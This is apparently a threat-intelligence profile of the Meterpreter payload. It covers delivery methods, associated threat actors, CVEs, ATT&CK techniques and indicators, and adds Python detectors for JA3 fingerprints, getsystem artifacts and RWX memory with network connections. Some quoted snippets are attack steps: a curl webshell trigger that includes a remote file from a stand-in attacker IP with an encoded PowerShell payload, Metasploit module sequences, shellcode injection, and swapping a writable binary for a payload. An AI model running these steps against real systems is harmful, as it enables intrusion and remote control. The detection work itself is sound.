Meterpreter
Meterpreter is the Metasploit Framework’s interactive post-exploitation payload: an in-memory agent that gives the operator a command shell, file system and process access, and loadable extensions on the compromised host. The source reporting describes it as a popular reverse shell within Metasploit and as a malicious agent used to manage and control victim computers. Observed forms include Windows and Linux reverse TCP payloads such as windows/meterpreter/reverse_tcp and linux/x86/meterpreter/reverse_tcp, and SMB-based variants. These are staged payloads: a small stager establishes the initial connection and receives the full Meterpreter component from the handler at runtime, which is why the reporting also notes that Meterpreter can act as a foothold that downloads more advanced components later. Stageless builds (for example windows/meterpreter_reverse_tcp) carry the whole payload in the initial binary instead.
Capabilities cited in the source reporting include remote command execution, backdoor access, and post-compromise control. Meterpreter is also referenced alongside privilege-escalation tradecraft, in particular Metasploit’s getsystem, which attempts named-pipe impersonation first, then rundll32-based execution of a dropped DLL, and finally token manipulation. Linux-focused detection content associates Meterpreter activity with reconnaissance of files such as /etc/machine-id, /etc/passwd, /proc/net/route, /proc/net/ipv6_route, and /proc/net/if_inet6, and with payload memory that is mapped read-write-execute (the detection keys on mprotect() calls that make a region RWX, followed by a network connection from the same binary).
Infection and delivery vectors mentioned in the content include phishing documents with malicious macros that download and execute a Meterpreter stager; fake software or game-related lures such as a Fortnite "multitool" executable that dropped a Meterpreter backdoor; malware packers; shellcode loaders; and deployment as an additional payload by other malware families and intrusion sets. Proofpoint observed Bumblebee dropping Meterpreter, and multiple reports describe Meterpreter being sent as a task or secondary payload alongside tools such as Cobalt Strike, Sliver, njRAT, Luminosity Link RAT, and custom downloaders.
Threat actor and campaign associations explicitly mentioned include DarkHotel, which separated a Meterpreter remote-control component from functional modules such as keylogging, screen capture, and USB theft; DragonSpark, where execution of m6699.exe or ShellCode_Loader enabled a Meterpreter session for remote command execution; Lebanese Cedar, which used Meterpreter with Explosive RAT to maintain access and steal legitimate network credentials for espionage; Transparent Tribe / Operation Transparent Tribe, where Meterpreter appeared among the toolset used against Indian diplomatic and military targets; Mustang Panda, which used Meterpreter-based shellcode and a Meterpreter stager in phishing campaigns; and Hive0065 / TA505, where attackers installed Meterpreter reverse and bind shells on compromised systems. The content also references Meterpreter-like payloads in the SEO#LURKER campaign and use through SYSTEMBC shellcode injection.
Targeting reflected in the associated reporting includes government, military, diplomatic, telecommunications, research, and enterprise environments, as well as opportunistic victims reached through phishing and trojanized software. Known indicators directly mentioned in the content include the IP address 81.19.135[.]241 identified as a Meterpreter C2 and OpenVPN server, reverse-shell connections to 91.214.124[.]20 and 91.214.124[.]25 in TA505-linked activity, and the JA3 fingerprint 5d65ea3fb1d4aa7d826733d2f2cbbb1d for Metasploit Meterpreter running on Linux.
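The JA3 hash given above is only useful if you can compute the same fingerprint from your own TLS captures. The following is an added worked example, not code from the page or from Metasploit: it parses a TLS ClientHello, builds the JA3 string (version, ciphers, extensions, supported groups, point formats, with GREASE values removed), hashes it, and looks the result up against the page’s Meterpreter hash. The ClientHello bytes are constructed inline from a builder; the hostname, cipher list and extension order are assumptions and do not reproduce real Meterpreter traffic.

```python
import hashlib
import struct

# Hash stated on this page for Metasploit Meterpreter running on Linux.
KNOWN_JA3 = {"5d65ea3fb1d4aa7d826733d2f2cbbb1d": "Metasploit Meterpreter (Linux)"}


def is_grease(v):
    """RFC 8701 GREASE values (0x0a0a, 0x1a1a, ... 0xfafa) are dropped before hashing, as JA3 specifies."""
    return (v & 0x0F0F) == 0x0A0A and (v >> 8) == (v & 0xFF)


def ja3_from_client_hello(record):
    """Return (ja3_string, ja3_md5) for a raw TLS record carrying a ClientHello."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a ClientHello handshake record")
    hs_len = int.from_bytes(record[6:9], "big")
    p = record[9:9 + hs_len]
    pos = 0
    version = struct.unpack_from("!H", p, pos)[0]; pos += 2
    pos += 32                                  # client random
    pos += 1 + p[pos]                          # session id
    cs_len = struct.unpack_from("!H", p, pos)[0]; pos += 2
    ciphers = [struct.unpack_from("!H", p, pos + i)[0] for i in range(0, cs_len, 2)]; pos += cs_len
    pos += 1 + p[pos]                          # compression methods
    ext_types, groups, formats = [], [], []
    if pos < len(p):
        ext_len = struct.unpack_from("!H", p, pos)[0]; pos += 2
        end = pos + ext_len
        while pos < end:
            etype, elen = struct.unpack_from("!HH", p, pos); pos += 4
            data = p[pos:pos + elen]; pos += elen
            ext_types.append(etype)
            if etype == 0x000A:                # supported_groups: 2-byte list length, then 2-byte ids
                glen = struct.unpack_from("!H", data, 0)[0]
                groups = [struct.unpack_from("!H", data, 2 + i)[0] for i in range(0, glen, 2)]
            elif etype == 0x000B:              # ec_point_formats: 1-byte list length, then 1-byte ids
                formats = list(data[1:1 + data[0]])
    fmt = lambda vals: "-".join(str(v) for v in vals if not is_grease(v))
    ja3 = ",".join([str(version), fmt(ciphers), fmt(ext_types), fmt(groups), fmt(formats)])
    return ja3, hashlib.md5(ja3.encode()).hexdigest()


def build_client_hello(version, ciphers, extensions):
    """Assemble a minimal TLS record holding a ClientHello (used here only to construct sample input)."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00"        # version, zero random, empty session id
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                                             # one compression method: null
    ext = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack("!H", len(ext)) + ext
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs


def sample_client_hello():
    """Constructed ClientHello with GREASE entries mixed in; not a capture of real Meterpreter traffic."""
    sni = b"c2.example.invalid"                                     # assumed hostname
    extensions = [
        (0x0A0A, b""),                                                  # GREASE extension
        (0x0000, struct.pack("!HBH", len(sni) + 3, 0, len(sni)) + sni), # server_name
        (0x000A, struct.pack("!HHHH", 6, 0x0A0A, 0x001D, 0x0017)),      # supported_groups: GREASE, x25519, secp256r1
        (0x000B, b"\x01\x00"),                                          # ec_point_formats: uncompressed
    ]
    return build_client_hello(0x0303, [0x0A0A, 0x1301, 0xC02F, 0x002F], extensions)


def classify(record):
    """Fingerprint a ClientHello and return (ja3_string, ja3_md5, known_label_or_None)."""
    ja3, digest = ja3_from_client_hello(record)
    return ja3, digest, KNOWN_JA3.get(digest)


if __name__ == "__main__":
    print(classify(sample_client_hello()))
```

Two caveats when hunting with this: JA3 identifies the TLS client stack, not Meterpreter itself, so the hash above will also match other clients built from the same Ruby/OpenSSL combination and should be corroborated with the destination and process context; and it applies only to TLS transports such as reverse_https, since the reverse_tcp payloads listed on this page do not speak TLS at all.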
Vulnerabilities exploited
11 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
On 6 April 2022, NCC Group’s Fox-IT discovered two separate flaws in FUJITSU CentricStor Control Center V8.1 which allow an attacker to gain remote code execution on the appliance without prior authentication or authorization. These are tracked as CVE-2022-31794 and CVE-2022-31795.
'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' } ... 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
WICKED PANDA ... began 2020 by conducting a wide-ranging campaign focused on exploiting multiple vulnerabilities (CVE-2019-19781 and CVE-2020-10189) ... deployed Cobalt Strike and Meterpreter payloads
The following analytic detects driver load errors in the Windows PrintService Admin logs, specifically identifying issues related to CVE-2021-34527 (PrintNightmare). It triggers on error messages indicating the print spooler failed to load a plug-in module, such as "meterpreter.dll," with error code 0x45A.
Metasploit uses printf to write the Meterpreter stager to disk in 20ish byte chunks (each exploit attempt must fit within a 26 byte buffer), which is quite slow.
Table 1: Filenames and hashes of files used by a threat actor Filename MD5 t.py (tied to scheduled task, python meterpreter reverse shell port 9090) ... g.py (tied to scheduled task, python meterpreter reverse shell port 8088) ...
Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application.
A threat actor exploited CVE-2023-46604 on an internet-facing Apache ActiveMQ server... The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring bean configuration XML file.
Threat actors are actively exploiting a recently disclosed critical vulnerability, tracked as CVE-2026-1731 (CVSS score: 9.9), in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The bug could allow an unauthenticated attacker to send specially crafted requests and run operating system commands remotely, without logging in.
Groups observed using it
24 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Compared to previous attack activities of this organization, this time DarkHotel has separated the remote control component (meterpreter) from functional components (keyboard logging, screen capture, and USB theft) for separate loading and operation.
Further use of Meterpreter and their custom Explosive RAT have been associated with objectives around maintaining access through theft of legitimate network credentials, ultimately pursuing espionage objectives.
Tools: SpicyOmelette, Cobalt Strike, Meterpreter, Mimikatz, CobtInt, ATMSpitter, Carbanak, Buhtrap, Cyst, Metasploit.
AhnLab reported that the Kimsuky group has used a Go language version of Meterpreter, and subsequent discoveries include additional Go-based malware like Troll Stealer and GoBear.
Cinnamon Tempest has used open-source tools including customized versions of the Iox proxy tool, NPS tunneling tool, Meterpreter, and a keylogger that uploads data to Alibaba cloud storage.
Techniques & procedures
37 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques
DarkHotel has separated the remote control component (meterpreter) from functional components (keyboard logging, screen capture, and USB theft) for separate loading and operation.
use auxiliary/scanner/smb/smb_login
CreateSession true
sessions -u <smb_session_id>
use post/windows/manage/smb_to_meterpreter
Execution
9 techniques
C:\Backup\info.txt documents a scheduled task invoked TFTP.EXE on a five-minute interval as Administrator.
If you want to use the script in PowerShell Empire, then you can run it on the agent by switching to the command line (shell) mode.
Trigger via the webshell: curl "http://<TARGET_IP>:8080/site/index.php?page=http://<ATTACKER_IP>:8000/cmd.php&cmd=powershell+-enc+<BASE64_PAYLOAD>"
We have a Meterpreter session as www-data. Upgrading to a Full Shell ... meterpreter > shell ... python -c 'import pty; pty.spawn("/bin/bash")'
Running oledump.py shows that the document contains macros... Olevba analyzes VBA macros and shows suspicious behavior such as auto-execution, obfuscation, and network activity.
In the analyzer you can see perl being leveraged to create and populate the jBNhk payload in the /tmp directory (with RWX permissions) and spawning a reverse Meterpreter shell.
When the user enabled macros, the document downloaded an executable named IPhone.exe from the same fake website. Then the executable was launched.
Persistence
4 techniques
C:\Backup\info.txt documents a scheduled task invoked TFTP.EXE on a five-minute interval as Administrator.
use auxiliary/scanner/smb/smb_login
CreateSession true
sessions -u <smb_session_id>
use post/windows/manage/smb_to_meterpreter
Privilege Escalation
4 techniques
C:\Backup\info.txt documents a scheduled task invoked TFTP.EXE on a five-minute interval as Administrator.
Back on Havoc, we’ll use the shellcode command with the architecture and the PID from our SYSTEM beacon. shellcode inject x64 PID# /home/kali/Desktop/msf.bin ... And with the shellcode successfully injected, we get a meterpreter shell back
Both tools first attempt to use “named pipe impersonation” to achieve SYSTEM privileges. This involves creating a Windows Service to execute as NT AUTHORITY\SYSTEM and feeding data to it through a named pipe that is randomly created by the malicious payload. | In addition to these methods, both tools also support a third method that involves token manipulation.
Stealth
7 techniques
You can also see an obfuscated VBA string that resembles Base64-encoded data.
The attacker embedded a list of files to be decrypted, all of which were encrypted ciphertexts... The first three types need to be decrypted using the same algorithm and key.
Back on Havoc, we’ll use the shellcode command with the architecture and the PID from our SYSTEM beacon. shellcode inject x64 PID# /home/kali/Desktop/msf.bin ... And with the shellcode successfully injected, we get a meterpreter shell back
Both tools first attempt to use “named pipe impersonation” to achieve SYSTEM privileges. This involves creating a Windows Service to execute as NT AUTHORITY\SYSTEM and feeding data to it through a named pipe that is randomly created by the malicious payload. | In addition to these methods, both tools also support a third method that involves token manipulation.
The second GetSystem method uses rundll32.exe and a few hardcoded command line options to execute a DLL for privilege escalation. Thankfully, the command line options are consistent and appear similar to this: rundll32.exe C:\Users\user\AppData\Local\Temp\fvxens.dll,a /p:fvxens
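The two getsystem artifacts described above (a service that writes to a random named pipe, and a rundll32 launch of a dropped DLL with the ",a /p:<name>" arguments) are both visible in process-creation telemetry. The following detector is an added example, not code from the page or from any vendor: it runs the two patterns over constructed Sysmon-style process-creation events. The field names (Image, CommandLine, ParentImage, ProcessId) follow Sysmon Event ID 1. The rundll32 pattern is taken directly from the command line quoted above; the exact "echo <x> > \\.\pipe\<x>" shape of the named-pipe service command is assumed from Metasploit’s elevate extension source, since the page only states that a service and a randomly named pipe are used.

```python
import re

# getsystem DLL technique: rundll32.exe <dropped>.dll,a /p:<name>. In the quoted sample the DLL
# basename and the /p: argument are the same random string (fvxens), which we treat as the strong signal.
RUNDLL_RE = re.compile(
    r"rundll32(?:\.exe)?\s+(?P<dll>\S+?\\(?P<base>[^\\\s,]+)\.dll),a\s+/p:(?P<arg>\S+)",
    re.IGNORECASE,
)
# getsystem named-pipe impersonation: a service (child of services.exe) whose command is a one-shot
# "echo <x> > \\.\pipe\<x>". Shape assumed from Metasploit's elevate extension, not stated on this page.
PIPE_RE = re.compile(r"echo\s+(?P<data>\S+)\s*>\s*\\\\\.\\pipe\\(?P<pipe>\S+)", re.IGNORECASE)


def detect_getsystem(events):
    """Return one alert per matching process-creation event; events are dicts with Sysmon field names."""
    alerts = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        parent = ev.get("ParentImage", "").lower()
        m = RUNDLL_RE.search(cmd)
        if m:
            alerts.append({
                "technique": "getsystem/rundll32-dll",
                "severity": "high" if m["base"].lower() == m["arg"].lower() else "medium",
                "dll": m["dll"],
                "pid": ev.get("ProcessId"),
            })
        m = PIPE_RE.search(cmd)
        if m and parent.endswith("\\services.exe"):
            alerts.append({
                "technique": "getsystem/named-pipe-impersonation",
                "severity": "high" if m["data"] == m["pipe"] else "medium",
                "pipe": m["pipe"],
                "pid": ev.get("ProcessId"),
            })
    return alerts


SAMPLE_EVENTS = [  # constructed Sysmon-style events, not real telemetry
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\user\AppData\Local\Temp\fvxens.dll,a /p:fvxens",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\update.exe"},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo mgwbm > \\.\pipe\mgwbm",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"ProcessId": 5012, "Image": r"C:\Windows\System32\rundll32.exe",      # benign control-panel launch
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 5100, "Image": r"C:\Windows\System32\cmd.exe",           # benign redirect to a file
     "CommandLine": r"cmd.exe /c echo hello > out.txt",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for alert in detect_getsystem(SAMPLE_EVENTS):
        print(alert)
```

The parent check on services.exe is what separates the impersonation service from ordinary shell redirects, and requiring a backslash before the DLL basename keeps well-known rundll32 invocations out of the first rule. Because Cobalt Strike’s getsystem shares these techniques, a hit tells you an operator ran getsystem, not which framework; pivot on the parent process and the DLL path (here under a user’s Temp directory) to attribute further.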
icacls confirms every authenticated user has full control over the binary. Replace it with a Meterpreter payload and wait for the scheduler to complete the chain.
The mprotect() system call is used to change the access protections on a region of memory that has already been allocated... Our aim with this detection rule is to detect network connections from binaries that have read, write and execute memory region permissions set.
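The Linux detection described in the summary and in the rule above (a binary holding read-write-execute memory that also has a network connection) can be approximated from procfs without a kernel sensor. The following is an added example, not the rule’s own code: it parses /proc/<pid>/maps for RWX mappings, /proc/net/tcp for established sockets, joins them through socket inodes, and runs over a constructed snapshot in which a perl process (as in the analyzer note under Execution) holds an anonymous RWX region and a connection to port 4444. The addresses, PIDs and inodes are invented; live_snapshot() builds the same structure from a real host but is not used by the offline sample.

```python
import os
import socket
import struct

TCP_ESTABLISHED = "01"   # state column of /proc/net/tcp


def rwx_regions(maps_text):
    """(start, end, path) for every mapping in /proc/<pid>/maps that is both writable and executable."""
    out = []
    for line in maps_text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5:
            continue
        addr, perms = parts[0], parts[1]
        if "w" in perms and "x" in perms:
            start, end = (int(x, 16) for x in addr.split("-"))
            out.append((start, end, parts[5] if len(parts) > 5 else "[anon]"))
    return out


def _hex_endpoint(field):
    """/proc/net/tcp encodes IPv4 as host-byte-order hex and the port as big-endian hex."""
    ip_hex, port_hex = field.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16))), int(port_hex, 16)


def established_sockets(net_tcp_text):
    """inode -> (remote_ip, remote_port) for ESTABLISHED entries of /proc/net/tcp."""
    out = {}
    for line in net_tcp_text.splitlines()[1:]:
        f = line.split()
        if len(f) < 10 or f[3] != TCP_ESTABLISHED:
            continue
        out[int(f[9])] = _hex_endpoint(f[2])
    return out


def find_rwx_with_network(snapshot):
    """Processes that own an RWX mapping and an established TCP peer, one finding per peer."""
    socks = established_sockets(snapshot["net_tcp"])
    findings = []
    for pid, proc in snapshot["processes"].items():
        regions = rwx_regions(proc["maps"])
        if not regions:
            continue
        for inode in proc["socket_inodes"]:
            if inode in socks:
                ip, port = socks[inode]
                findings.append({"pid": pid, "comm": proc["comm"],
                                 "rwx_regions": len(regions), "remote": f"{ip}:{port}"})
    return findings


def live_snapshot():
    """Build the snapshot structure from a running Linux host (needs rights to read other PIDs' fds)."""
    procs = {}
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            with open(f"/proc/{pid}/maps") as fh:
                maps = fh.read()
            inodes = set()
            for fd in os.listdir(f"/proc/{pid}/fd"):
                target = os.readlink(f"/proc/{pid}/fd/{fd}")
                if target.startswith("socket:["):
                    inodes.add(int(target[8:-1]))
        except OSError:
            continue
        procs[pid] = {"comm": comm, "maps": maps, "socket_inodes": inodes}
    with open("/proc/net/tcp") as fh:
        return {"processes": procs, "net_tcp": fh.read()}


SAMPLE_SNAPSHOT = {  # constructed sample, not captured from a real host
    "processes": {
        4242: {"comm": "perl", "socket_inodes": {98765},
               "maps": ("55d0c1a00000-55d0c1a2c000 r-xp 00000000 08:01 131 /usr/bin/perl\n"
                        "7f2b3c000000-7f2b3c021000 rwxp 00000000 00:00 0\n"
                        "7ffd1e3f0000-7ffd1e411000 rw-p 00000000 00:00 0 [stack]\n")},
        1337: {"comm": "sshd", "socket_inodes": {555},
               "maps": "55e000000000-55e0000c0000 r-xp 00000000 08:01 42 /usr/sbin/sshd\n"},
        2001: {"comm": "java", "socket_inodes": set(),          # JIT heap: RWX but no socket
               "maps": "7f0000000000-7f0000100000 rwxp 00000000 00:00 0\n"},
    },
    "net_tcp": (
        "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
        "   0: 0A00000A:C350 0500000A:115C 01 00000000:00000000 00:00000000 00000000  1000        0 98765 1 0000000000000000 20 4 30 10 -1\n"
        "   1: 0A00000A:0016 1400000A:DA1C 01 00000000:00000000 00:00000000 00000000     0        0 555 1 0000000000000000 20 4 30 10 -1\n"
        "   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 333 1 0000000000000000 100 0 0 10 0\n"
    ),
}

if __name__ == "__main__":
    for finding in find_rwx_with_network(SAMPLE_SNAPSHOT):
        print(finding)
```

JIT runtimes (Java, browsers, some interpreters) legitimately map RWX pages, which is why the rule above insists on the network connection as well; in practice you will still want to allow-list known JIT binaries by path and treat an anonymous RWX region in a scripting host such as perl or python as the high-value case. A polling check like this also misses a region that was RWX only briefly, which is what the mprotect()-based kernel rule catches.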
Credential Access
2 techniques
Discovery
5 techniques
Executes the shell “ifconfig” command. The expect routine looks for a string containing “+” as an indication of success.
Executes the shell “whoami” command. The expect routine looks for a string containing “Logon ID:” as an indication of success.
Executes the shell “netstat” command. The expect routine checks for a string containing the word “Protocol” as an indication of success.
Lateral Movement
2 techniques
Collection
4 techniques
DarkHotel has separated the remote control component (meterpreter) from functional components (keyboard logging, screen capture, and USB theft) for separate loading and operation.
Command and Control
5 techniques
Hunting C2/Adversaries Infrastructure with Shodan and Censys ... My research Cobalt Strike C2 Metasploit/MSF Covenant C2 Deimos C2 Posh C2 Brute Ratel C4 Mythic C2 Sliver C2 ... Night Hawk C2 NimPlant C2 ShadowPad C2 Infrastructure Async Rat C2 Infrastructure Meterpreter C2 Infrastructure
[*] Started reverse TCP handler on 192.168.159.128:4444 ... [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49766)
A hidden feature of Metasploit is the ability to add SMB named pipe listeners in a meterpreter session to pivot on an internal network. | In the same way as a port forward pivot is set up, your meterpreter session registers a named pipe and listens for connections to it. After it has been configured, your meterpreter session acts as a listener for SMB connections.
IOCs tracked for this family
89 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
116 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Meterpreter is referenced as a Metasploit payload used for remote shell/access sessions.
Meterpreter is a Metasploit payload used for interactive remote access and post-exploitation on compromised systems.
Meterpreter is used here as a reverse TCP payload generated with msfvenom to provide remote shell access from an internal Windows host back to the attacker through port forwarding.
A lightweight stager payload that establishes initial remote access to a compromised system and can download more advanced components later.